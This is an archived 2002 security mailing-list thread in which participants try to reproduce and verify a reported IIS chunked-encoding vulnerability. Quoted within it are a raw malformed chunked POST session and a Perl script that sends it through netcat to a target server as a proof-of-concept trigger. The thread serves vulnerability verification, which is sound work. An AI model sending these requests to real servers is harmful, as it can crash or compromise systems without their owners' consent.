Thanks, but I must have missed where the 100 continue return code was
the defining factor of vulnerability.
I can get this to return, but I have no way to verify vulnerability that
I can see. The original description released by Marc said that a popup
appeared and that a message was entered in the Application Event log.
Since I can not reproduce either of these symptoms, how do I verify
vulnerability. If I send the same data as below to a patched host, it
still comes back with the 100 continue return code.
Oh and on the locked up I mentioned before, I meant that HTTP session
locked, not IIS itself. Not something I can count on, since it didn't
seem to happen every time and did not seem to produce any of the signs
noted in the advisory.
On Fri, 2002-04-12 at 12:52, damdum wrote:
> It should be noted that the request must be properly formatted (not sloppy),
> this means using CRLF not just LF. Here is a quick perl proggy:
>
> use IPC::Open2;
>
> $pid = open2(\*IN, \*OUT, "nc -nv 10.10.10.69 80");
>
> print OUT "POST /iisstart.asp HTTP/1.1\r\n".
> "Accept: */*\r\n".
> "Host: victom.com\r\n".
> "Content-Type: application/x-www-form-urlencoded\r\n".
> "Transfer-Encoding: chunked\r\n".
> "\r\n".
> "10\r\n".
> "PADPADPADPADPADP\r\n".
> "4\r\n".
> "DATA\r\n".
> "4\r\n".
> "DEST\r\n".
> "0\r\n";
>
> $buff = <IN>;
> if($buff =~ /HTTP\/1\.1 100 Continue/)
> {
> print "Got HTTP 100 Continue, sending returns...\n";
> sleep 1;
>
> print OUT "\r\n\r\n\r\n";
> print OUT "\r\n\r\n\r\n";
>
> print "Done\n";
> }
> else
> {
> print "Hrmm, didn't find HTTP 100 Continue, bye.\n";
> }
>
> close IN;
> close OUT;
>
>
> --
> damdum
>
>
> Quoting MadHat <madhatat_private>:
>
> > I have not been able to reproduce these results. I have managed to lock
> > up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages
> > appear and no entries in the Application Log. I have also been able get
> > the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but
> > still no popup or messages.
> >
> > Is there a reliable way to scan for these vulnerabilities remotely?
> >
> > On Thu, 2002-04-11 at 11:25, Erik Parker wrote:
> > > JM> Anyone have a proof of concept for this exploit?
> > >
> > > eEye included some. Use this with "netcat" or "telnet"
> > >
> > > replace [enter] with an actual pressing of your enter key (look at the
> > > bottom, you can cut n paste)
> > >
> > > It should return something like this, if it worked (and generate a popup
> > > error to you that says "Unknown has generated errors")
> > >
> > > HTTP/1.1 100 Continue
> > > Server: Microsoft-IIS/5.0
> > > Date: Wed, 27 Mar 2002 23:37:32 GMT
> > >
> > > If it fails, it'll say something like:
> > >
> > > HTTP/1.1 500 Server Error
> > > Server: Microsoft-IIS/5.0
> > >
> > >
> > > The application log will say:
> > >
> > > Active Server Pages service has started
> > > Access performance data was denied to IWAM_netbiosname as attempted from
> > c:\WINNT\SYSTEM32\Drwtsn32.exe
> > >
> > >
> > > **************Begin Session****************
> > > POST /iisstart.asp HTTP/1.1
> > > Accept: */*
> > > Host: eeye.com
> > > Content-Type: application/x-www-form-urlencoded
> > > Transfer-Encoding: chunked
> > >
> > > 10
> > > PADPADPADPADPADP
> > > 4
> > > DATA
> > > 4
> > > DEST
> > > 0
> > > [enter]
> > > [enter]
> > > **************End Session******************
> > >
> > --
> > MadHat at Unspecific.com
> > gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
> > Key fingerprint = E786 7B30 7534 DCC2 94D5 91DE E922 0B21 9DDC 3E98
> >
> >
>
--
MadHat at Unspecific.com
gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
Key fingerprint = E786 7B30 7534 DCC2 94D5 91DE E922 0B21 9DDC 3E98
This archive was generated by hypermail 2b30 : Fri Apr 12 2002 - 14:13:02 PDT